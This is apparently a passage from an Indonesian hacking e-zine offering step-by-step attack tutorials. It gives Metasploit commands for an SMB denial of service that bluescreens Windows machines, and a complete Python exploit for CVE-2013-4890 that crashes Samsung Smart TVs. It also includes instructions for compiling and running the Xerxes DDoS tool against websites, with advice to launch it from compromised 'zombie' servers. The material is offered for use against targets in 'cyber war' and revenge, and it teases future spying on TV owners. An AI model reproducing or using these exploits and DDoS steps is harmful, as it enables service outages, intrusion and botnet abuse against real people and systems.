  • 59. 59e-ZIT #Vol 2 - Networking commandnya ada disini, http://forum.codernate.org/thread-331.html silahkan di coba.. Ingat, OSnya Harus Cocok Kayak Daftar Yang Di Atas... klo udah dapet ip korbannya, langsung aja deh buka tools metasploitnya,, ne letak toolsnya klik ikon backtrack lalu pilih, backtrack > explotation > network explotation tools > metasploit framework > klik msfconsole setelah di consolenya ketik perintah berikut Code: - msf > use dos/windows/smb/ms06_063_trans - msf auxiliary(ms06_063_trans) > set LPORT 445 # setting port ke 445 - msf auxiliary(ms06_063_trans) > set RHOST IP_TARGET # ip address target bro - msf auxiliary(ms06_063_trans) > run
  • 60. 60e-ZIT #Vol 2 - Networking kayak gini kalo udah maka hasilnya akan seperti ini, kebetulan temen Bifi setelah di bujuk dengan Big Cola 1 botol dia mau jadi korbannya,, kasian...
  • 61. 61e-ZIT #Vol 2 - Networking neh hasilnya, langsung di capture . . . Yap, target langsung mengalami bluescreen :) nah gitu aja... ne thread Bifi specialin buat temen Bifi yang gak mau disebut namanya, thank.z zob udah mau laptopnya dijadiin korban,,, n buat yang make OS untuk Hacking or Hoby ngumpul tools hacking, di pake toolsnya bukan di jadiin hiasan . . . Terakhir Jangan Males googling Yah... referensi > forum.id-backtrack.com ./regards Bifi
  • 62. 62e-ZIT #Vol 2 - Networking Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack Yups, setelah beberapa bulan miskin thread, akhirnya dapat juga,,, berawal dari searching-searching di mbah gugel, eh nemu juga... wkwkw, seperti judul di atas, kali ini bifi mau kasih tau POCnya, Step 1... Copas script python dibawah ini... Code: #!/usr/bin/python # Exploit Title: Samsung TV Denial of Service (DoS) Attack # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com # Date: 07/21/2013 # CVE Number: CVE-2013-4890 # Vendor Homepage: http://www.samsung.com # Description: # The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request # As a results, the TV reboots... # Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :) import httplib import sys import os print " ************************************************************************ ***************" print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.comn" print " Exploit: Denial of Service (DoS) attackn" print " Description:n" print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request." print " Tested successfully on my Samsung PS50C7700 plasma TV :)n" print " ************************************************************************ ***************n" # Sends the payload print " Sending the malicious payload...n" conn = httplib.HTTPConnection(sys.argv[1],5600) conn.request("GET", "A"*300) conn.close() # Checks the response print " Checking the status... (CTRL+Z to stop)n" response = 0 while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Target down!n"
  • 63. 63e-ZIT #Vol 2 - Networking Atau ambil saja disini http://www.exploit-db.com/exploits/27043/ save dengan extensi .py .. terserah namanya apa, bifi.py kek, gula.py kek,,, whatever you want bro.... jangan lupa beri file permissionnya dulu ketik chmod +x namafile.py + enter contoh : root@bifi:~# chmod +x gula-gula.py #Step 2 Usahakan kita berada dalam 1 jaringan yang sama,, dalam hal ini masih via LAN untuk versi WiFi bifi masih belum paham a.k.a masih di cari POC nya,,,, yarp kalo udah scan dulu IP Target bisa make NMAP or apalah,,,, setelah target di dapat,,, misalkan IP targetnya 200.100.1.22, nah tinggal jalankan scriptnya.... #Step 3 untuk jalankan scriptnya, cukup open terminal masuk ke directory script.py yang tadi kita udah simpan, lalu ketik ./namascript.py IP_TARGET contoh : root@bifi:~# ./gula-gula.py 200.100.1.22 + enter daaaan, tango down,, check dengan ping IP Target, jika uncreable/timeout berarti target down,,,,, Nah mengapa target down,,,??? itu terjadi karena port TCP/5600 pada Samsung Smart TV tersebut mengalami crash, karena script tersebut mengirim "HTTP GET request" yang panjang atau sangat banyak.. sehingga TV dipaksa untuk restart a.k.a reboot... neh fungsi yang membuat port tersebut crash Code: conn = httplib.HTTPConnection(sys.argv[1],5600) yups mungkin itulah sedikit POC dari cara DoS Samsung TV,,,, Script ini masih work di segala jenis SAMSUNG SMART TV..... Tested On : Samsung plasms TV PS50C7700.
  • 64. 64e-ZIT #Vol 2 - Networking nah next thread nanti Bifi akan jelaskan POC untuk mendapatkan full access remote pada SAMSUNG SMART TV, hingga kita bisa memantau semua aktivitas pemilik TV tersebut alias "we keep the eyes and ears in the living room" TO BE CONTINUED Referensi http://www.exploit-db.com/exploits/27043/ http://www.infosecurity.com http://securityaffairs.co http://www.youtube.com/watch?v=U-R2epNnU...r_embedded Special Thanks To Ivan Tabrakan Untuk Kuotanya and My Brother Ical yang udah menjadi penerjemah, hahahaha gak perlu buka gugel translate lagi kan udah ada ical translate ./regards Bifi
  • 65. 65e-ZIT #Vol 2 - Networking Network Attack > How To Use Xerxes DDoS Tools Yups Malam Semuanya,, jumpa lagi sama saya Bifi yang aneh dan gemana gitu... okok, bagi kaka-kaka para peserta #OP atau yang suka ngikutin perang cyber, entah demi membela negara, agama, atau memang dendam sama website target, yups sesuai judul diatas kali ini Bifi mau share tentang cara penggunaan Xerxes DDoS Tool,, nah yang belum tau tentang tools yang 1 ini, neh Bifi kasih tau Xerxes itu nama toolsnya wkwkwkkw, yup isinya berupa script-script gak masuk akal make bahasa C, nah tools ini digunakan oleh Th3 J3st3r untuk takedown situs-situs yang jadi target mereka.... nah kenapa Bifi jadiin ini thread karena, Bifi Udah puyeng nyari tutornya di mbah gugel tapi nggak ketemu cara gunain tuh tools, yang ada hanya scriptnya doang,,,, okeh langsung aja yah, pertama kita donlod atau copas dulu scriptnya disini http://pastebin.com/aWZMbjSU next,, kalo udah, ganti extensinya dengan "C" contoh xerxes.txt ganti dengan xerxes.c atau kalo di copas langsung aja save dengan extensi "c" nya contoh xerxes.c... yup untuk ngejalaninnya kita harus compile dulu scriptnya, kalo dilinux nama compilernya g++, itu loh compilernya bahasa C, kalo nggak salah,, dan kalo belum punya langsung di install aja sekalian, neh comandnya.. sudo apt-get install g++ lanjood,, nah cara compilenya [untuk linux] gini open terminal ketik g++ namafile -o nama output filenya contoh : g++ xerxes.c -o xerxes kalo untuk windows pake Turbo C, cuman Bifi belum tau cara make nya... siip, setelah di compile jalankan scriptnya, masih di terminal linux, ketik ./nama toolsnya [IP Target] [Port] contoh : ./xerxes 200.100.1.1 80 lalu tekan enter,,, siip tinggal tunggu aja ampe targetnya mampus...
  • 66. 66e-ZIT #Vol 2 - Networking nb > bagusnya bandwith kaka dewo, biar nggak jadi senjata makan tuan,, dan untuk penggunaan yang lebih memuaskan a.k.a mematikan, mending ne script di taruh di zombie- zombienya agan, trus di execute, apalagi kalo punya zombie di server-server negara besar yang mempunyai speed inet dewo, makin ampuh deh,,,,,, nah sekian tutorial Bifi, Salam Backtrackers Gretz To > All Codernate | ZIT Crew referensi : http://www.google.com http://www.securitytube.net ./regards Bifi
  • 67. 67e-ZIT #Vol 2 - Networking ZIT Product & Info Codernate Linux 1.4 (Dodorobe) Released!!! Versi : Codernate Linux 1.4 Dodorobe Tanggal Rilis : 13 Januari 2014 Pengguna : Beginers s/d Expert Ukuran : 2.14 GB Codernate Linux merupakan Sistem Operasi Berbasis Open Source (Linux) yang merupakan Turunan dari Ubuntu 10.04 yang di kembangkan oleh Komunitas Zona IT Ternate. Codernate Linux sendiri di modifikasi khusus untuk penetrasi jaringan, dan kurang lebih terdapat sekitar 150 tool penetrasi yang filenya terdapat pada folder /pentest, dan langsung bisa di eksekusi lewat menu Codernate.
  • 68. 68e-ZIT #Vol 2 - Networking Dan setelah mengalami beberapa perbaikan pada bug dan tools, akhirnya Codernate Linux 1. 4 dengan Codename "Dodorobe" dengan bangga kami lepas ke publik. pada versi yang kali ini masih sama seperti pada versi sebelumnya, yaitu masih tetap pada penetrasi jaringan, hanya saja untuk yang versi ke 4 ini sudah ada sedikit penambahan beberapa tools dll. Bagi Teman-teman yang ingin langsung mencobanya bisa langsung download di link berikut... http://apps.e-zit.com/Codernate_Linux_1.4_dodorobe_v.iso << Dodorebe untuk yang pengen coba versi sebelumnya [Codernate Cacarlak], bias juga di download di link dibwah ini http://apps.e-zit.com/Codernate_Linux_1.3_cacarlak_v.iso << Cacarlak ./regards e-ZIT
  • 69. 69e-ZIT #Vol 2 - Networking Credits Cara Kirim Artikel Di e-ZIT edisi berikutnya Isi materi artikel:  Programing  Networking  Operating System  Design & Art  Hacking Catatan: Artikel diharapkan sudah di post sebelumnya di www.forum.codernate.org, jika materi hasil copas, harap di sertakan link referensinya, artikel yang masuk akan di seleksi terlebih dahulu oleh redaksi e-ZIT. Redaksi Website : www.e-zit.com Layouter : e-ZIT Editor : e-ZIT Cover : Bifi Grets To : JMozac, Feenx_0, Mavis Vermilion, shockw4f3, Surtua, r8punkz3l, Bifi n All Staff Zona IT Ternate
  • 70. 70e-ZIT #Vol 2 - Networking Home Page